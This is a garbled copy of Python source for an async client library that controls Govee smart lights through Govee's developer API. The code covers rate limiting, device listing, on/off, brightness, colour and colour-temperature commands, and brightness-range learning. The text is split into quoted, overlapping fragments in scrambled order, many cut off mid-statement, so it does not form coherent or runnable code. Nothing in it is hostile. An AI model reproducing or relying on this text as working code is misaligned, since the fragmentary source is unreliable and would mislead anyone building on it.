_RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which", "= logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL", "device_str = device.device if not device_str in self._devices: device = None # disallow", "json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json", "100: # set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command", "not device: err = f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str}", "if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting:", "command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result,", "success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self,", "= brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control( device, command, brightness_set", "254\" ) elif green < 0 or green > 255: err = f\"set_color:", "= self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result =", "\"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager", "device_str in self._devices: device = None # disallow unknown devices elif isinstance(device, str)", "Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None", "# effenctive state # defaults by some conditions if not is_retrievable: learned_get_brightness_max =", "hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do", "async def ping(self) -> Tuple[float, 
str]: \"\"\"Ping the api endpoint. No API_KEY is", "# we got something, so we are online self._track_rate_limit(response) # return the async", "device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device:", "self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str ) ->", "_get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one", "await self.turn_on(device) # api doesn't work if we don't sleep await asyncio.sleep(1) #", "to use this Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage)", "async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async", "possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked", "repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status =", "as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set", "# this is the learning config, possibly overridden by a global config class", "*, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage for", "= None err = None if not device: err = f\"Invalid device {device_str},", "100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range", "learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning", "elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color =", "100 # assumption, as we didn't get anything higher ) if prop_brightness >", "self._utcnow 
self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async", "was able to connect to the API.\"\"\" return self._online def _set_online(self, online: bool):", "self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature", "changed something, return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug(", "response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP", "self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success,", "learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable,", "254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up to", "self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if", "rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a", "clients. 
\"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that", "slider doesn't match the actual brightness pull the brightness up to max once.\",", "await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err,", "brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on,", ") ) as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API Methond", "if not device: err = f\"Invalid device {device_str}, {device}\" else: command = \"turn\"", "self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close", "delay = int((time.time() - start) * 1000) if response.status == 200: if \"Pong\"", "err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock =", "json=json ) ) as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True,", "possible: {err}\") elif not command in device.support_cmds: err = f\"Command {command} not possible", "_RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in the current rate", "all devices as offline for device in self.devices: device.online = False async def", "params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if not device:", "as we didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max =", "\"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL =", "device, return success and error message.\"\"\" return await 
self._turn(device, \"off\") async def _turn(", "for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element", "device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color", "device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device", "result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp", "# output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ):", "some room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set", "def online(self): \"\"\"Last request was able to connect to the API.\"\"\" return self._online", "device {device_str}, {device}\" else: if brightness < 0 or brightness > 254: err", "in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming", "= val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off", "False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp = 0 for", "device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed.", "by default. False: an offline device doesn't change power state. 
True: an offline", "color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b)", "self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to get utc", "f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err = f\"Device {device.device} is", "= await response.text() delay = int((time.time() - start) * 1000) if response.status ==", "to 0-254.\"\"\" success = False err = None device_str, device = self._get_device(device) if", "we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate", "device doesn't change power state. True: an offline device is shown as off.", "device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\"", "str) and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str,", "== 200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err =", "bool online: bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int", "create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method", "= [] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) ->", "allowed range 0 .. 
254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await", "> 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100", "changed = False # init Dict and entry for device if learning_infos ==", "{self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit", "self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "client package.\"\"\" import asyncio import logging import time import math from contextlib import", "elif blue < 0 or blue > 255: err = f\"set_color: invalid value", "_track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded,", "err = f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or color_temp", "load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max", "result, err = await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result)", "import asynccontextmanager from dataclasses import dataclass from datetime import datetime from events import", "called by turn_on and turn_off.\"\"\" success = False err = None device_str, device", "red must be within 0 .. 
254\" ) elif green < 0 or", ") if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max ==", "config_offline_is_off = False # effenctive state # defaults by some conditions if not", "return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device", "learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range", "str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool", "2000-9000.\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\"", "result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source", "self._devices: device = None # disallow unknown devices elif isinstance(device, str) and device_str", "learning storage as long as we run. 
# we will need to re-learn", "\"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE =", "are all dicts with one element if \"online\" in prop: prop_online = prop[\"online\"]", "bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool", "def _turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn", "= self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds.", "prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in", "self._devices[device_str] elif seconds_locked: # we just changed something, return state from history self._devices[device_str].source", "brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result,", "in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at", "def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return", "asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return", "Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining", "None err = None async with self._api_get(url=_API_PING, auth=False) as response: result = await", "= {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err =", "_LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. 
Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json", "err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err = f\"Device", "asynccontextmanager from dataclasses import dataclass from datetime import datetime from events import Events", "brightness to 0-254.\"\"\" success = False err = None device_str, device = self._get_device(device)", "else: command = \"turn\" params = onOff result, err = await self._control(device, command,", "prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not", "\"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color", "without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self", "else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def _get_device_state( self,", "math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: # set brightness as", "@rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if", "* 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max", "async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async", "None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we got", "assumed. 
If the brightness slider doesn't match the actual brightness pull the brightness", "not device.retrievable: # device {device_str} isn't able to return state, return 'history' state", "# init Dict and entry for device if learning_infos == None: learning_infos =", "err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\",", "= \"turn\" params = onOff result, err = await self._control(device, command, params) success", "within 0 .. 254\" ) elif green < 0 or green > 255:", "datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate", "self._err_msg = err_msg status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal:", "self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command", "in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element if \"online\"", "== \"on\" return success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness:", "str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth),", "not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max", "what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned", "_API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL =", "if response.status == 200: result = await response.json() timestamp = self._utcnow() learning_infos =", "= None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result =", "-= 1 async def rate_limit_delay(self): 
\"\"\"Delay a call when rate limiting is active.\"\"\"", "limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property", "self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we got something, so", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err", "-> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in", "an offline device doesn't change power state. True: an offline device is shown", "if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned,", "_turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command", "that trigger rate limiting. Defaults to 5, which means there is some room", "< 0: seconds_lock = 0 return seconds_lock async def _control( self, device: Union[str,", "is offline. None: default, use config_offline_is_off from learning, or False by default. False:", "for device in self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check", ".. 254\" else: command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\":", "limit is counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining", "as response: self._set_online(True) # we got something, so we are online self._track_rate_limit(response) #", "if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100:", "calls that trigger rate limiting. Defaults to 5, which means there is some", "offline. None: default, use config_offline_is_off from learning, or False by default. 
False: an", "self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result)", "= await self._control(device, command, brightness_set) if err: # try again with 0-100 range", "True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range", "self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\"", "%s\" % repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg", "for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed =", "assume we are online self.events = Events() self._api_key = api_key self._devices = {}", "GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and", "prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max", "= True # load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str]", "seconds_locked: # we just changed something, return state from history self._devices[device_str].source = \"history\"", "in seconds when the rate limit will be reset.\"\"\" return self._limit_reset @property def", "async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield", "device = None # disallow unknown devices elif isinstance(device, str) and device_str in", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp <", "permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests", "off. 
\"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\"", "_API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate", "Methond handling all HTTP calls. This also handles: - rate-limiting - online/offline status", "inform about state change self.events.online(self._online) if not online: # show all devices as", "async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles:", "limiter threshold {val} must be below {self._limit}\" ) if val < 1: raise", "\"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool,", "result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from", "not device_str in self._devices: device = None # disallow unknown devices elif isinstance(device,", "prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif", "global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set", "to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online state", "context manager exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__( self,", "prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif", "per minute. 
_RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in the", "+ DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await response.text() err", "\"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err = await", "def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\":", "that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold", "params=params) as response: if response.status == 200: timestamp = self._utcnow() json_obj = await", "we didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254", "# assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on", "return success, err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int,", "learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str,", "List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return", "_LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]:", "devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES) as response:", "not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. 
Command waiting: {cmd}\")", "= float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" )", "will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that", "not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True:", "{\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json):", "for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single", "= False err = None device_str, device = self._get_device(device) if not device: err", "This also handles: - rate-limiting - online/offline status \"\"\" err = None await", "HTTP calls. This also handles: - rate-limiting - online/offline status \"\"\" err =", "err = f\"set_color: invalid value {color}, must be tuple with (r, g, b)", "class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str device_name: str", "api endpoint. 
No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None", "else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work", "brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control( device, command, brightness_set )", "int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config,", "change.\"\"\" if self._online != online: self._online = online # inform about state change", "\"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property", "response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err", "if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100", "\"Rate-Limit-Reset\" # The time at which the current rate limit window resets in", "await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status ==", "0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err =", "0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: # use an", "return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\"", "learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self,", "device @property def online(self): \"\"\"Last request was able to connect to the API.\"\"\"", "if we don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set =", "self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254 prop_brightness", 
"self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async def", "as response: if response.status == 200: result = await response.json() timestamp = self._utcnow()", "onOff result, err = await self._control(device, command, params) success = False if not", "device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device", "sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining}", "err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool,", "behavour when device is offline. None: default, use config_offline_is_off from learning, or False", "with the Client without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self,", "= \"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state", "else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response:", "in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state =", "= None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we", "and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses", "= -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def", "check if other devices also utilize the govee API\" ) limit_unknown = True", "self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp = self._utcnow() json_obj =", "( 100 # assumption, as we didn't get anything higher ) if prop_brightness", 
"_LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if not device: err", "Device DTO \"\"\" device: str model: str device_name: str controllable: bool retrievable: bool", "values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False", "brightness pull the brightness up to max once.\", device.device, ) changed = True", "{result}\" # cache last get_devices result self._devices = devices return self.devices, err def", "= {} err = None async with self._api_get(url=_API_DEVICES) as response: if response.status ==", "f\"Rate limit exceeded, check if other devices also utilize the govee API\" )", "= None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state # defaults", "{color}, must be tuple with (r, g, b) values\" else: red = color[0]", "device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS", "self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable =", "b) where each value may be in range 0-255 \"\"\" success = False", "await response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async", "# global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option", "str model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool", "brightness_result_100 result, err = await self._control( device, command, brightness_set ) if not err:", "devices as offline for device in self.devices: device.online = False async def 
check_connection(self)", "json=json ) as response: if response.status == 200: device.lock_set_until = ( self._utcnow() +", "255: err = f\"set_color: invalid value {color}, blue must be within 0 ..", "-1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if", "API.\"\"\" try: # this will set self.online await self.ping() except: pass return self.online", "from datetime import datetime from events import Events from typing import Any, List,", "\"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False err = None", "0: seconds_lock = 0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice],", "ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False) as response: result", "device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] =", "devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst def", "learning_infos == None: learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] =", "keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're permitted to", "def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create", "if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s", "if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True", "logging import time import math from contextlib import asynccontextmanager from dataclasses import dataclass", "from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining", "brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err = await 
self._control(device, command,", "brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int source: str error:", "Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns: device_address, device_dto", "= f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or color_temp >", "success = False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness >", "learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage for learned", "None, ): \"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\",", "in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop:", "Govee Device DTO \"\"\" device: str model: str device_name: str controllable: bool retrievable:", ") elif green < 0 or green > 255: err = f\"set_color: invalid", "{result}\" else: result = await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay,", "0-100 range if \"API-Error 400\" in err: # Unsupported Cmd Value # set", "await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self)", "self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we just changed something,", "item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] #", "= onOff == \"on\" return success, err async def set_brightness( self, device: Union[str,", "check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this will set self.online", "was lerned, and learn if ( 
